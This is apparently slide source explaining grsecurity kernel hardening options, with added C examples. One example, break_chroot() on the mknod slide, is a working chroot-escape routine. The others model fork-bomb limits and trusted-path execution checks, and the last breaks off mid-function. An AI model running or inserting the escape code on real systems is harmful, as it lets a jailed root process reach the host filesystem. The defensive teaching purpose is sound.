%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny (f)chmod +s
%font "code"
CONFIG_GRKERNSEC_CHROOT_CHMOD
%font "standard"
	Jailed processes cannot set the suid/sgid bits with chmod() or fchmod()
	suid/sgid bits have no business in a restricted environment
	Prevents privilege escalation by restricted processes
		and prevents an unprivileged, unrestricted process from obtaining privileges from a privileged but restricted one
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to chmod
%% or fchmod files to make them have suid or sgid bits. This protects
%% against another published method of breaking a chroot. If the sysctl
%% option is enabled, a sysctl option with name "chroot_deny_chmod" is
%% created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny mknod
%font "code"
CONFIG_GRKERNSEC_CHROOT_MKNOD
%font "standard"
	Jailed processes cannot call mknod()
	Prevents escaping the jail through direct access to devices
		by creating block or character special files
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be allowed to
%% mknod.
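Added example, not code from the slides or from grsecurity: the escape quoted above from chroot(2) ("mkdir foo; chroot foo; cd ..") written out as a C function, so that the two options it defeats are visible step by step. It needs CAP_SYS_CHROOT, i.e. root inside the jail; for an unprivileged user chroot() fails with EPERM and the function returns -1 without changing anything. The directory name under /tmp is an assumption, any directory the process can create will do.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Returns 0 when the process ends up with the real filesystem root as its
 * root directory, -1 with errno set otherwise (EPERM when not root).
 * CONFIG_GRKERNSEC_CHROOT_CHDIR defeats step 2: the working directory is
 * moved inside the new root, so step 3 has nothing to climb from.
 * CONFIG_GRKERNSEC_CHROOT_DOUBLE defeats steps 2 and 4: a jailed process
 * is not allowed to call chroot() at all. */
int break_chroot(void)
{
    /* 1. create a throw-away directory; it only has to exist */
    char dir[] = "/tmp/jailbreakXXXXXX";   /* assumed writable location */
    if (mkdtemp(dir) == NULL)
        return -1;

    /* 2. chroot into it WITHOUT chdir(): the working directory is left
     *    outside the new root, which is the whole trick */
    if (chroot(dir) == -1) {
        int saved = errno;
        rmdir(dir);
        errno = saved;
        return -1;
    }

    /* 3. climb: ".." is only clamped at the root directory, and our cwd is
     *    not below it, so each step goes one level up towards the real root */
    for (int i = 0; i < 64; i++)
        if (chdir("..") == -1)
            break;

    /* 4. a second chroot onto where we landed: the real root */
    if (chroot(".") == -1)
        return -1;
    rmdir(dir);                             /* tidy up; path is real again */
    return 0;
}
```

Run inside a jail as root the function leaves the process with the host root; the accompanying test only exercises the unprivileged path, where the first chroot() is refused. Both "Deny double-chroots" and "Enforce chdir("/")" stop the sequence, which is why the slides recommend enabling both.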
%% The problem with using mknod inside a chroot is that it
%% would allow an attacker to create a device entry that is the same
%% as one on the physical root of your system, which could range from
%% anyhing from the console device to a device for your harddrive (which
%% they could then use to wipe the drive or steal data). It is recommended
%% that you say Y here, unless you run into software incompatibilities.
%% If the sysctl option is enabled, a sysctl option with name
%% "chroot_deny_mknod" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny ptraces
%font "code"
CONFIG_GRKERNSEC_CHROOT_PTRACE
%font "standard"
	Jailed processes cannot call ptrace()
	Prevents escaping the jail by debugging processes outside it
	Processes in restricted environments have no reason to debug other processes
		especially when those are not restricted
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to ptrace
%% other processes. Ptracing a process allows one to attach and alter the
%% flow of execution for the process. It is strongly recommended that you
%% say Y here. If the sysctl option is enabled, a sysctl option with name
%% "chroot_deny_ptrace" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Restrict priority changes
%font "code"
CONFIG_GRKERNSEC_CHROOT_NICE
%font "standard"
	Jailed processes cannot call nice() to raise their priority
	Prevents denial of service by CPU consumption
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to raise
%% the priority of processes in the chroot, or alter the priority of
%% processes outside the chroot.
%% This provides more security than simply
%% removing CAP_SYS_NICE from the process' capability set. If the
%% sysctl option is enabled, a sysctl option with name "chroot_restrict_nice"
%% is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Capability restrictions within chroot
%font "code"
CONFIG_GRKERNSEC_CHROOT_CAPS
%font "standard"
	Drops capabilities from root processes inside a jail so that they can no longer
		insert modules:
%cont, font "code"
CAP_SYS_MODULE
%cont, font "standard"
		open raw devices:
%cont, font "code"
CAP_SYS_RAWIO
%cont, font "standard"
		perform system and network administration tasks:
%cont, font "code"
CAP_SYS_ADMIN
%cont, font "standard"
		transfer capabilities:
%cont, font "code"
CAP_SETPCAP
%cont, font "standard"
		or configure ttys:
%cont, font "code"
CAP_SYS_TTY_CONFIG
%cont, font "standard"
	Processes in restricted environments have no reason to perform such tasks
	Left optional because it breaks some applications that need them
%%%font "code"
%% If you say Y here, the capabilities on all root processes within a
%% chroot jail will be lowered to stop module insertion, raw i/o,
%% system and net admin tasks, transferring capabilities, and
%% tty configuration tasks. This is left an option because it breaks
%% some apps. Disable this if your chrooted apps are having
%% problems performing those kinds of tasks. If the sysctl option is
%% enabled, a sysctl option with name "chroot_caps" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Secure keymap loading
%font "code"
CONFIG_GRKERNSEC_KBMAP
%font "standard"
	Only root may remap keyboard keys and function keys (KDSKBENT / KDSKBSENT ioctls)
	Otherwise anyone with access to the console can change the bindings
%%%font "code"
%% If you say Y here, KDSKBENT and KDSKBSENT ioctl calls being
%% called by unprivileged users will be denied. If you answer N,
%% everyone with access to the console will be able to modify keyboard
%% bindings.
%% If the sysctl option is enabled, a sysctl option with name
%% "secure_kbmap" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 4/8
%cont, fore "grey40"
Buffer Overflow Protection
%cont, fore "grey60"
Access Control Lists
%cont, fore "grey80"
Filesystem Protections
%cont, fore "green"
Kernel Auditing
Executable Protections
Network Protections
Sysctl support
Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Single group for auditing
%font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%font "standard"
	Restricts the logging of exec, chdir, (un)mount and ipc calls to one group
	Avoids denial of service through resource consumption by the logging system
	Requires the processes and users to be watched to belong to one group, which you specify
%%%font "code"
%% If you say Y here, the exec, chdir, (un)mount, and ipc logging features
%% will only operate on a group you specify. This option is recommended
%% if you only want to watch certain users instead of having a large
%% amount of logs from the entire system. If the sysctl option is enabled,
%% a sysctl option with name "audit_group" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID for auditing
%font "code"
CONFIG_GRKERNSEC_AUDIT_GID 1007
%font "standard"
	The group whose exec, chdir, (un)mount and ipc calls are logged
	Requires "Single group for auditing"
%cont, font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%font "standard"
%%%font "code"
%% Here you can choose the GID that will be the target of kernel auditing.
%% Remember to add the users you want to log to the GID specified here.
%% If the sysctl option is enabled, whatever you choose here won't matter.
%% You'll have to specify the GID in your bootup script by echoing the GID
%% to the proper /proc entry. View the help on the sysctl option for more
%% information.
%% If the sysctl option is enabled, a sysctl option with name
%% "audit_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Exec logging
%font "code"
CONFIG_GRKERNSEC_EXECLOG
%font "standard"
	Enables logging of execve() calls (every exec*() call ends in execve())
	Produces a large volume of logs on a busy system
	Restricted to one group if "Single group for auditing"
%cont, font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%cont, font "standard", fore "white", size 4
is enabled
%%%font "code"
%% If you say Y here, all execve() calls will be logged (since the
%% other exec*() calls are frontends to execve(), all execution
%% will be logged). Useful for shell-servers that like to keep track
%% of their users. If the sysctl option is enabled, a sysctl option with
%% name "exec_logging" is created.
%% WARNING: This option when enabled will produce a LOT of logs, especially
%% on an active system.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Log execs within chroot
%font "code"
CONFIG_GRKERNSEC_CHROOT_EXECLOG
%font "standard"
	Logs every execve() call made by jailed processes
%%%font "code"
%% If you say Y here, all executions inside a chroot jail will be logged
%% to syslog. If the sysctl option is enabled, a sysctl option with name
%% "chroot_execlog" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Chdir logging
%font "code"
CONFIG_GRKERNSEC_AUDIT_CHDIR
%font "standard"
	Enables logging of chdir() calls
	Restricted to one group if "Single group for auditing"
%cont, font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%cont, font "standard", fore "white", size 4
is enabled
%%%font "code"
%% If you say Y here, all chdir() calls will be logged. If the sysctl
%% option is enabled, a sysctl option with name "audit_chdir" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
(Un)Mount logging
%font "code"
CONFIG_GRKERNSEC_AUDIT_MOUNT
%font "standard"
	Enables logging of filesystem mounts and unmounts
	Restricted to one group if "Single group for auditing"
%cont, font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%cont, font "standard", fore "white", size 4
is enabled
%%%font "code"
%% If you say Y here, all mounts and unmounts will be logged. If the
%% sysctl option is enabled, a sysctl option with name "audit_mount" is
%% created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
IPC logging
%font "code"
CONFIG_GRKERNSEC_AUDIT_IPC
%font "standard"
	Enables logging of the creation and removal of
		message queues
		semaphores
		shared memory segments
	Restricted to one group if "Single group for auditing"
%cont, font "code"
CONFIG_GRKERNSEC_AUDIT_GROUP
%cont, font "standard", fore "white", size 4
is enabled
%%%font "code"
%% If you say Y here, creation and removal of message queues, semaphores,
%% and shared memory will be logged. If the sysctl option is enabled, a
%% sysctl option with name "audit_ipc" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Signal logging
%font "code"
CONFIG_GRKERNSEC_SIGNAL
%font "standard"
	Logs certain important signals such as SIGSEGV
		shows when a program misbehaves
		may reveal failed attempts to exploit a vulnerability (an overflow with a wrong return address crashes the target)
%%%font "code"
%% If you say Y here, certain important signals will be logged, such as
%% SIGSEGV, which will as a result inform you of when a error in a program
%% occurred, which in some cases could mean a possible exploit attempt.
%% If the sysctl option is enabled, a sysctl option with name
%% "signal_logging" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Fork failure logging
%font "code"
CONFIG_GRKERNSEC_FORKFAIL
%font "standard"
	Logs failed fork() calls
	May indicate an attempted denial of service against the system
		by fork bombing
		by overstepping a process limit
%%%font "code"
%% If you say Y here, all failed fork() attempts will be logged.
%% This could suggest a fork bomb, or someone attempting to overstep
%% their process limit. If the sysctl option is enabled, a sysctl option
%% with name "forkfail_logging" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Set*id logging
%font "code"
CONFIG_GRKERNSEC_SUID
%font "standard"
	Enables logging of set*id() calls
	Can generate many events on some busy systems
		depends on the normal behaviour of the applications
	Cannot be selected together with "Log set*ids to root"
%%%font "code"
%% If you say Y here, all set*id() calls will be logged. Such information
%% could be useful when detecting a possible intrusion attempt. This
%% option can produce a lot of logs on an active system. If the sysctl
%% option is enabled, a sysctl option with name "suid_logging" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Log set*ids to root
%font "code"
CONFIG_GRKERNSEC_SUID_ROOT
%font "standard"
	Only logs set*id() calls where a user asks to change to the root user or group
	May reveal the exploitation of a vulnerability
		shellcodes usually begin with setreuid()
			because /bin/bash2 drops its privileges when the effective user and/or group differ from the real ones
				see the -p option in bash(1) v2.x
			because tcsh refuses to run in the same situation
	Cannot be selected together with "Set*id logging"
%%%font "code"
%% If you say Y here, only set*id() calls where a user is changing to the
%% gid or uid of the root user will be logged. Such information
%% could be useful when detecting a possible intrusion attempt. This
%% option will produce less logs than logging all calls. If the sysctl
%% option is enabled, a sysctl option with name "suid_root_logging" is
%% created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Time change logging
%font "code"
CONFIG_GRKERNSEC_TIME
%font "standard"
	Logs every change of the system clock
%%%font "code"
%% If you say Y here, any changes of the system clock will be logged.
%% If the sysctl option is enabled, a sysctl option with name
%% "timechange_logging" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 5/8
%cont, fore "grey40"
Buffer Overflow Protection
%cont, fore "grey40"
Access Control Lists
%cont, fore "grey60"
Filesystem Protections
%cont, fore "grey80"
Kernel Auditing
%cont, fore "green"
Executable Protections
Network Protections
Sysctl support
Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Exec process limiting
%font "code"
CONFIG_GRKERNSEC_EXECVE
%font "standard"
	The process limit (RLIMIT_NPROC) is also checked on execve()
		normally it is checked only on fork()
	Prevents bypasses of the process limit
%%%font "code"
%% If you say Y here, users with a resource limit on processes will
%% have the value checked during execve() calls. The current system
%% only checks the system limit during fork() calls. If the sysctl option
%% is enabled, a sysctl option with name "execve_limiting" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Randomized PIDs
%font "code"
CONFIG_GRKERNSEC_RANDPID
%font "standard"
	Makes process ID generation random
	Makes attacks by signals or by debugging harder
		the PIDs of daemons started at boot are no longer predictable
		temporary file names built from the PID are no longer predictable either
%%%font "code"
%% If you say Y here, all PIDs created on the system will be
%% pseudo-randomly generated. This is extremely effective along
%% with the /proc restrictions to disallow an attacker from guessing
%% pids of daemons, etc. PIDs are also used in some cases as part
%% of a naming system for temporary files, so this option would keep
%% those filenames from being predicted as well. We also use code
%% to make sure that PID numbers aren't reused too soon. If the sysctl
%% option is enabled, a sysctl option with name "rand_pids" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Altered default IPC permissions
%font "code"
CONFIG_GRKERNSEC_IPC
%font "standard"
	Derives the default permissions of newly created IPC objects (e.g. shared memory segments) from the user's umask when the application does not set them itself
	The default access rights are ugo+rwx under Linux
%%%font "code"
%% If you say Y here, the default permissions for IPC objects will be
%% set based on the filesystem umask of the user creating the object.
%% By default linux sets the permissions to ugo+rwx, which can be
%% a security problem if the application doesn't explicitly set the
%% permissions of the IPC object.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Limit uid/gid changes to root
%font "code"
CONFIG_GRKERNSEC_TTYROOT
%font "standard"
	Gives access to options restricting root access by console type
	Only applies to processes that have a tty, i.e. interactive sessions
	Meant to stop a user holding a (stolen) root password from using it unless the console type matches
%%%font "code"
%% If you say Y here, you will be able choose from three option that
%% will allow you to restrict access to the root account by console
%% type. These options should only be enabled if you are sure of what
%% you're doing. Also note that they only apply to processes that have
%% ttys, which generally involves some kind of user-interaction. The
%% options are basically in place to keep users on a system who have a
%% (stolen) password for root from using it unless their console
%% credentials match.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny physical consoles (tty)
%font "code"
CONFIG_GRKERNSEC_TTYROOT_PHYS
%font "standard"
	Denies root access from physical consoles
	Requires "Limit uid/gid changes to root"
%cont, font "code"
CONFIG_GRKERNSEC_TTYROOT
%font "standard"
%%%font "code"
%% If you say Y here, access to root from physical consoles will be
%% denied. This is only recommended for rare cases where you will
%% never need to be physically at the machine.
%% If the sysctl option
%% is enabled, a sysctl option with name "deny_phys_root" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny serial consoles (ttyS)
%font "code"
CONFIG_GRKERNSEC_TTYROOT_SERIAL
%font "standard"
	Denies root access from serial consoles
	Requires "Limit uid/gid changes to root"
%cont, font "code"
CONFIG_GRKERNSEC_TTYROOT
%font "standard"
%%%font "code"
%% If you say Y here, access to root from serial consoles will be
%% denied. Most people can say Y here, since most don't use serial
%% devices for their console access. If you are unsure, say N. If
%% the sysctl option is enabled, a sysctl option with name
%% "deny_serial_root" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny pseudo consoles (pty)
%font "code"
CONFIG_GRKERNSEC_TTYROOT_PSEUDO
%font "standard"
	Denies root access from pseudo consoles (telnet, ssh, X terminals)
	Requires "Limit uid/gid changes to root"
%cont, font "code"
CONFIG_GRKERNSEC_TTYROOT
%font "standard"
%%%font "code"
%% If you say Y here, access to root from pseudo consoles will be
%% denied. Pseudo consoles include consoles from telnet, ssh, or any other
%% kind of interactive shell initiated from the network. Pseudo consoles
%% also include any terminals you use in XFree86. If you will only be
%% accessing the machine for root access from the physical console, you
%% can say Y here. Only say Y here if you're sure of what you're doing.
%% If the sysctl option is enabled, a sysctl option with name
%% "deny_pseudo_root" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Fork-bomb protection
%font "code"
CONFIG_GRKERNSEC_FORKBOMB
%font "standard"
	For users in the specified group, limits
		the total number of processes allowed
		the number of new processes per second allowed
	Prevents denial of service by fork bombing
		a fixed process count alone (PAM limits) does not stop rapid fork-and-exit churn, the per-second limit does
		the offending process is killed
%%%font "code"
%% If you say Y here, you will be able to configure a group to add to users
%% on your system that you want to be unable to fork-bomb the system.
%% You will be able to specify a maximum process limit for the user and
%% set a rate limit for all forks under their uid. (Fork-bombing is a
%% tactic used by attackers that can be enacted in two ways, (1) loading
%% up thousands of processes until the system can't take any more (this
%% method can be stopped outside of the kernel with PAM, however we place
%% protection for it in the kernel to be more complete and reduce overhead),
%% and (2), by forking processes at a rapid rate, and then killing them
%% off, which cannot be protected against in the same way at tactic 1)
%% The rate limit is specified in forks allowed per second. Set this
%% limit low enough to stop tactic 2, but high enough to allow for
%% normal operation. The protection will kill the offending process.
%% If the sysctl option is enabled, a sysctl option with name
%% "fork_bomb_prot" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID for restricted users
%font "code"
CONFIG_GRKERNSEC_FORKBOMB_GID 1006
%font "standard"
	The group the limited users belong to
	Requires "Fork-bomb protection"
%cont, font "code"
CONFIG_GRKERNSEC_FORKBOMB
%font "standard"
%%%font "code"
%% Here you can choose the GID to enable fork-bomb protection for.
%% Remember to add the users you want protection enabled for to the GID
%% specified here. If the sysctl option is enabled, whatever you choose
%% here won't matter.
%% You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information. If the sysctl option is
%% enabled, a sysctl option with name "fork_bomb_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Forks allowed per second
%font "code"
CONFIG_GRKERNSEC_FORKBOMB_SEC 40
%font "standard"
	Maximum number of fork() calls per second for a limited user
	Requires "Fork-bomb protection"
%cont, font "code"
CONFIG_GRKERNSEC_FORKBOMB
%font "standard"
%%%font "code"
%% Here you can specify the maximum number of forks allowed per second.
%% You don't want to set this value too low, or else you'll hinder
%% normal operation of your system. The default value should be fine for
%% most users. If the sysctl option is enabled, a sysctl option with name
%% "fork_bomb_sec" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Maximum processes allowed
%font "code"
CONFIG_GRKERNSEC_FORKBOMB_MAX 20
%font "standard"
	Maximum number of processes for a limited user
		do not go below 8: man(1) alone spawns up to 8 processes
	Requires "Fork-bomb protection"
%cont, font "code"
CONFIG_GRKERNSEC_FORKBOMB
%font "standard"
%%%font "code"
%% Here you can configure the maximum number of processes users in the
%% fork-bomb protected group can run. I would not recommend setting a
%% value lower than 8, since some programs like man(1) spawn up to 8
%% processes to run. The default value should be fine for most purposes.
%% If the sysctl option is enabled, a sysctl option with name
%% "fork_bomb_max" is created.
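Added example, not code from the slides or from grsecurity: a userland model of the two limits described on the fork-bomb slides above, with the defaults they quote (20 processes, 40 forks per second). The structure and function names are this example's own; in the kernel the state lives per uid and the offending process is killed, here the verdict is simply returned so the two tactics from the help text can be replayed.

```c
#include <stdint.h>

#define FORKBOMB_MAX  20    /* CONFIG_GRKERNSEC_FORKBOMB_MAX */
#define FORKBOMB_SEC  40    /* CONFIG_GRKERNSEC_FORKBOMB_SEC */

/* Per-user accounting for a member of the protected group (hypothetical). */
struct fb_user {
    uint32_t uid;
    unsigned nprocs;          /* processes currently owned by uid */
    uint64_t window_start;    /* second in which forks_this_sec started counting */
    unsigned forks_this_sec;
};

enum fb_verdict { FB_ALLOW = 0, FB_DENY_MAX = 1, FB_DENY_RATE = 2 };

/* Consulted on every fork() by the user; `now` is a clock in whole seconds.
 * On FB_ALLOW the new process is accounted for immediately. */
enum fb_verdict forkbomb_check(struct fb_user *u, uint64_t now)
{
    if (u->window_start != now) {          /* a new one-second window */
        u->window_start = now;
        u->forks_this_sec = 0;
    }
    /* tactic 1: pile up live processes until the system chokes */
    if (u->nprocs >= FORKBOMB_MAX)
        return FB_DENY_MAX;
    /* tactic 2: fork and exit very fast; the live count never grows,
     * so only a rate limit catches it */
    if (u->forks_this_sec >= FORKBOMB_SEC)
        return FB_DENY_RATE;
    u->forks_this_sec++;
    u->nprocs++;
    return FB_ALLOW;
}

/* Called when one of the user's processes exits. */
void forkbomb_exit(struct fb_user *u)
{
    if (u->nprocs > 0)
        u->nprocs--;
}

/* Replay tactic 2: `forks` fork()+exit() pairs inside the second `now`.
 * Returns how many of them were allowed. */
unsigned forkbomb_churn(struct fb_user *u, uint64_t now, unsigned forks)
{
    unsigned allowed = 0;
    for (unsigned i = 0; i < forks; i++) {
        if (forkbomb_check(u, now) == FB_ALLOW) {
            allowed++;
            forkbomb_exit(u);              /* the child exits at once */
        }
    }
    return allowed;
}
```

The test replays both tactics: 100 fork-and-exit pairs in one second stop at 40 even though the live count never exceeds 2, and a user who keeps children alive is stopped at 20 regardless of how slowly the forks arrive.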
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Trusted path execution
%font "code"
CONFIG_GRKERNSEC_TPE
%font "standard"
	Forbids executing programs that are not in a trusted directory
		a directory owned by root and writable only by root
	Forbids executing any program brought in by a user
	Blocks running local exploits
	Useless when an interpreter such as perl is present
		the exploit can always be ported to perl and fed to the interpreter
%%%font "code"
%% If you say Y here, you will be able to choose a gid to add to the
%% supplementary groups of users you want to mark as "untrusted."
%% These users will not be able to execute any files that are not in
%% root-owned directories writeable only by root. If the sysctl option
%% is enabled, a sysctl option with name "tpe" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Glibc protection
%font "code"
CONFIG_GRKERNSEC_TPE_GLIBC
%font "standard"
	Prevents executing any program while glibc environment variables such as LD_PRELOAD are set
	Also blocks evasion by invoking the dynamic loader /lib/ld-2.* directly on an untrusted binary
	These variables change the behaviour of /lib/ld-2.*
		this program is used by every dynamically linked program to load shared libraries
		so they would let an untrusted library into a trusted program, bypassing the trusted-path protection
	Requires "Trusted path execution"
%cont, font "code"
CONFIG_GRKERNSEC_TPE
%font "standard"
%%%font "code"
%% If you say Y here, all non-root users will not be able to execute
%% any files while glibc specific environment variables such as
%% LD_PRELOAD are set, which could be used to evade the trusted path
%% execution protection. It also protects against evasion through
%% /lib/ld-2.* It is recommended you say Y here also. If the sysctl option
%% is enabled, a sysctl option with name "tpe_glibc" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Partially restrict non-root users
%font "code"
CONFIG_GRKERNSEC_TPE_ALL
%font "standard"
	Lets the other (non-root, not in the TPE group) users execute programs only from directories that
		belong to the user
		are writable by the user alone (not group or world writable)
		or are trusted (root-owned, root-writable only)
	Lets a user run their own programs
	Prevents an attacker from getting a victim user to run a potentially malicious program
	Requires "Trusted path execution"
%cont, font "code"
CONFIG_GRKERNSEC_TPE
%font "standard"
%%%font "code"
%% If you say Y here, All other non-root users will only be allowed to
%% execute files in directories they own that are not group or
%% world-writeable, or in directories owned by root and writeable only by
%% root. If the sysctl option is enabled, a sysctl option with name
%% "tpe_restrict_all" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID for untrusted users
%font "code"
CONFIG_GRKERNSEC_TPE_GID 1005
%font "standard"
	Restricts the ban on executing programs outside trusted directories to a given group
	Requires "Trusted path execution"
%cont, font "code"
CONFIG_GRKERNSEC_TPE
%font "standard"
%%%font "code"
%% Here you can choose the GID to enable trusted path protection for.
%% Remember to add the users you want protection enabled for to the GID
%% specified here. If the sysctl option is enabled, whatever you choose
%% here won't matter. You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information. If the sysctl option is
%% enabled, a sysctl option with name "tpe_gid" is created.
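Added example, not code from the slides or from grsecurity: the trusted-path decision described on the three TPE slides above, as a userland check that can be run against any path before exec. Only the directory holding the program is examined, as the help text says: trusted means root-owned and writable by root alone, and with the "Partially restrict" rule the user's own directory qualifies too provided nobody else can write to it. The second function is the "Glibc protection" rule; the list of loader variables it rejects is an assumption, since the slides only name LD_PRELOAD. Function names are this example's own.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Decide whether `uid` may execute `path`.  Returns 1 = allowed,
 * 0 = denied (also when the directory cannot be stat()ed).  root is
 * exempt in grsecurity; callers handle that, this function does not. */
int tpe_allows_exec(const char *path, uid_t uid, int restrict_all)
{
    char buf[4096];
    struct stat st;

    if (strlen(path) >= sizeof buf)
        return 0;
    strcpy(buf, path);
    const char *dir = dirname(buf);            /* POSIX dirname may edit buf */

    if (stat(dir, &st) == -1 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))      /* others could drop a binary here */
        return 0;
    if (st.st_uid == 0)
        return 1;                              /* trusted path: root's, root-writable only */
    if (restrict_all && st.st_uid == uid)
        return 1;                              /* CONFIG_GRKERNSEC_TPE_ALL: own directory */
    return 0;
}

/* CONFIG_GRKERNSEC_TPE_GLIBC: refuse to exec while dynamic-loader
 * variables are set, because they let an untrusted library into a
 * trusted binary.  The list below is this example's assumption. */
int tpe_env_is_clean(char *const envp[])
{
    static const char *const banned[] = {
        "LD_PRELOAD=", "LD_LIBRARY_PATH=", "LD_AUDIT="
    };
    for (size_t i = 0; envp[i] != NULL; i++)
        for (size_t j = 0; j < sizeof banned / sizeof banned[0]; j++)
            if (strncmp(envp[i], banned[j], strlen(banned[j])) == 0)
                return 0;
    return 1;
}

/* Usage: ./tpe /path/to/program  (decision for the calling user) */
int main(int argc, char *argv[])
{
    extern char **environ;
    const char *path = argc > 1 ? argv[1] : "/usr/bin/id";
    int ok = tpe_allows_exec(path, geteuid(), 1) && tpe_env_is_clean(environ);
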